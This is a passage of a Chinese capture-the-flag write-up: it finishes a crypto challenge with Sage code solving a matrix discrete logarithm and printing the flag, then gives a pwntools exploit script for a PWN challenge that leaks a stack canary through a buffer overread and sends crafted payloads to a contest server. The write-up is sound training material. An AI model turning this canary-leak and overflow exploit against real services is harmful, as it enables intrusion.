[3469577371288079926, 5204366058378782250, 12143520750775862343, 706665985740, 12143515359139397843, 24876891455539, 12143449149385190675, 5204499435641729607, 1734628523990131469, 119757210113970, 12143470097256549947, 9282407958928],
[10986995009101166671, 1734788687033207505, 12143520752514668698, 680173911560, 12143515570582515443, 23883386182656, 12143452072344092516, 10408859957710764174, 8673790006740000925, 4047954924507284041, 12143472277719610437, 8879790035168],
[12143520799534210329, 8095680534365818753, 12143520754224346525, 6071761054204856029, 12143515774342357443, 22931775530664, 12143454859049102627, 122586336122081, 12143373761302849103, 109840689548590, 8095634066844843878, 8500892291801],
[2428704159899526175, 7286112481016467893, 12143520755876491019, 629765964828, 12143515968446948123, 9714838668887734012, 4857345013259425502, 117630592711632, 12143379764863568374, 105318302849760, 2428659620509049335, 7286120625945355053],
[7286112479717322389, 7286112480971640825, 12143520757456628435, 606320684970, 12143516152115449139, 4857429497934652454, 4857347490735050126, 112978994964264, 12143385390297217523, 101086824360217, 7286069740980100293, 7286120294834973633],
[7727695054246476847, 1202487728, 12143520758958480293, 584144077140, 12143516325240923843, 20377952745696, 12143462294760579275, 108622249048560, 12143390651947217363, 97133513961120, 12143479741445599772, 8831658996900830432],
[12143520799535388887, 1161628182, 12143520760380594623, 563225247585, 12143516488091679443, 19626876325056, 12143464472820678035, 104545135017180, 12143395570399006523, 93441517429260, 12143481309754543787, 7218375794633]]
enc = [[6218417900726690014, 9327172375980932592, 4153527959371790237, 132501760371295655, 7299109180510132427, 1648440321256276927, 10254693889934546668, 4725557258212165861, 202540954318317287, 9982016014873956804, 12039778149630734734, 9041012188688166860], [3076804875574387393, 10302499316575177148, 6883027490395277833, 10878965853169213290, 9440772171285517930, 793484497395967159, 3203070038396226958, 3243524965914218040, 10903462885339873262, 6328127784146872505, 3582866063885730405, 7656522484723054646], [6760440055042602927, 150299808832813166, 8106927197068158588, 3568136066830207645, 1915695218154982134, 11420119896639238238, 4976062871832376425, 5853866011790802336, 2581655278311379827, 10329181983489200369, 11095959626942470743, 3321403548342671501], [6989296053899761245, 8000749793706207705, 3809964528725899038, 4265030375240040581, 8089437371864148142, 5053064810412901554, 6501938965780936220, 10980028692407817118, 1863994316213089323, 8802681688697262113, 11477364106737785286, 3974421463550032713], [564344169406003662, 10724528903365710678, 10337956806430136031, 2024700528402916143, 11872118105346920062, 6838139960468687332, 2511372139663339351, 704113312599525196, 3251401730670339537, 10799465026599377540, 8770053125971443972, 6814688868085941116], [3520978035324296134, 5828225067833111657, 9070639660343598399, 566393201097489131, 7135313009663503048, 12051739882139705242, 1250122561645263412, 8926361503228079288, 1824549628801039352, 2820357879648474411, 10688580232568249253, 2688980806680871259], [5664448213737495613, 2454324330766153188, 9301881451933430336, 3021484798573229472, 8271546929364126837, 7678973012480737958, 9191201408409357883, 11850313540574789398, 9524210559263349425, 10585572460443926001, 7222517189955148361, 11305799364557617365], [10461986521764931850, 5752221957033325066, 2329192457304812250, 7045570806888107634, 3107570932863726810, 8394731797841115111, 9099090649026739137, 9624140552706688612, 3502511045385838990, 
3708709186460615427, 1380093196284505784, 6602173655057694105], [1628309316322170753, 8386682411272881459, 463052945030722337, 3094940575624695048, 9530557699190097735, 1189223359914307451, 95193999334854086, 9341511963235067451, 6499604981217622391, 11490873719281743251, 5788517522054066633, 6458318206067819330], [10262011543342924955, 10077405855258558051, 10534972018308857652, 7315712994565818330, 10727209214692737176, 38582499997230642, 7524643012491815390, 692052671905385931, 839117674622565504, 3738047667125884979, 3518017017084862562, 8345863842327754628], [2124572295600479486, 4109858666604779750, 8841167859692695947, 7527947761152890553, 5299879731039341554, 4012836051669960233, 11962255964799745220, 401093546211622697, 5086394577875124600, 836158269929849554, 8396307845611866890, 2005411230628730963], [6960829097328848685, 7974906431099851239, 11577910301734480466, 12134540342063390442, 4130839186501336093, 2878999232538232129, 8815211529803293482, 5165433981826992396, 10462641014399297415, 6335190222647425343, 1593313890583893142, 6411592929118677856]]
# Sage code: ^ is exponentiation.
# Turn the nested lists into matrices over the integers modulo p.
A = matrix(Zmod(p),A)
enc = matrix(Zmod(p),enc)
y = pohlig_hellman_DLP(A, enc, p)
# The logarithm is only known modulo x, the lcm of the moduli that
# pohlig_hellman_DLP kept, so the true exponent has the form x * i + y.
x = lcm(lcm(229,593),1944001580291) # the elements of crt_moduli
# Hard-coded residue, presumably the value returned by the call above.
y = 86353340462193003
# Try each candidate below p and print the flag for the one that reproduces
# enc; the flag body is the MD5 of the exponent's decimal string.
for i in range(10000):
    if x * i + y < p:
        if A ^ (x * i + y) == enc:
            print('DASCTF{' + hashlib.md5(str(x * i + y).encode()).hexdigest() + '}')
    else:break
直接跑出来的 y,不能直接用
要加上 x 的 i 倍
最后求出来 x·i + y,MD5一下即可
DASCTF{d7fd1e0d54aab17195f2e80e0d0cefbc}
PWN
签个到
pwn师傅太懒,就给了个∠本
#encoding: utf-8
#!/usr/bin/python
from pwn import*
import sys
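#context.log_level = "debug"
context.arch="amd64"
binary_name = "pwn"
ld_name = "ld"
# NOTE(review): despite its name, local == 1 selects the remote target below.
local = 1
elf =ELF("./"+binary_name)
#ld = ELF("./"+ld_name)

# Short aliases for the tube `io`. The lambdas look `io` up when they are
# called, so they may be defined before `io` is assigned further down.
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
# Unpack a 32/64-bit value, padding a short read with zero bytes first.
# The fill argument of bytes.ljust() must be exactly one byte; the listing
# showed b'x00' (the backslash was lost), which ljust() rejects.
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
info = lambda tag, addr :log.info(tag + " -------------> " + hex(addr))
ia = lambda :io.interactive()

# Open the tube: the contest host when local == 1, otherwise the local binary.
if local==1:
    io = remote("node4.buuoj.cn",27456)
else:
    io = process("./"+binary_name)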
def debug():
    """Attach gdb to the tube `io` with one breakpoint, then pause the script."""
    # $rebase(...) is presumably the debugger plugin's helper for addresses
    # relative to the binary's load base -- confirm for the setup in use.
    gdb_commands = '''
b *$rebase(0x014F7)
'''
    gdb.attach(io, gdb_commands)
    pause()
def add(length, name):
    """Choose menu entry 1, then answer the "length: " and "name: " prompts.

    The length is sent as a decimal line; the name is sent as given, without a
    trailing newline.
    """
    length_line = str(length).encode()
    sla(b"> ", b"1")
    sla(b"length: ", length_line)
    sa(b"name: ", name)
def get(data):
    """Choose menu entry 2, then answer the "data: " prompt with data as given."""
    menu_choice = b"2"
    sla(b"> ", menu_choice)
    sa(b"data: ", data)
# Answer the greeting with nine 'a' bytes, skip the first eight in the reply
# and read the next eight bytes as a 64-bit value.
# NOTE(review): subtracting 0x61 ('a') suggests the ninth byte replaced the
# low byte of the stack canary and that the service echoes the buffer without
# terminating it -- confirm against the binary, which is not on this page.
sa(b"who are u?",b"a"*9)
ru(b"a"*8)
canary = uu64(io.recv(8))-0x61
info("canary",canary)
# A zero-length entry whose name carries 0x14 filler bytes, the 64-bit value
# 0x20d51 and the low 32 bits of the leaked value.
# NOTE(review): the meaning of 0x20d51 is not stated on the page -- confirm.
add(0x0,b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff))
io.sendline()
# The high 32 bits of the leaked value plus four filler bytes are stored with
# menu entry 1 and then submitted again with menu entry 2.
add(0x8,p32((canary>>32)&0xffffffff)+b"aaaa")
get(p32((canary>>32)&0xffffffff)+b"aaaa")
# debug()
# sa(b"> ",b"2")
ia()
参考资料
加密网站: https://www.sojson.com/encrypt_aes.html
[2]
网站: https://www.alpertron.com.ar/ECM.HTM
原文始发于微信公众号(杭师大网安):DAS 11月月赛TeamGipsy战队 WriteUp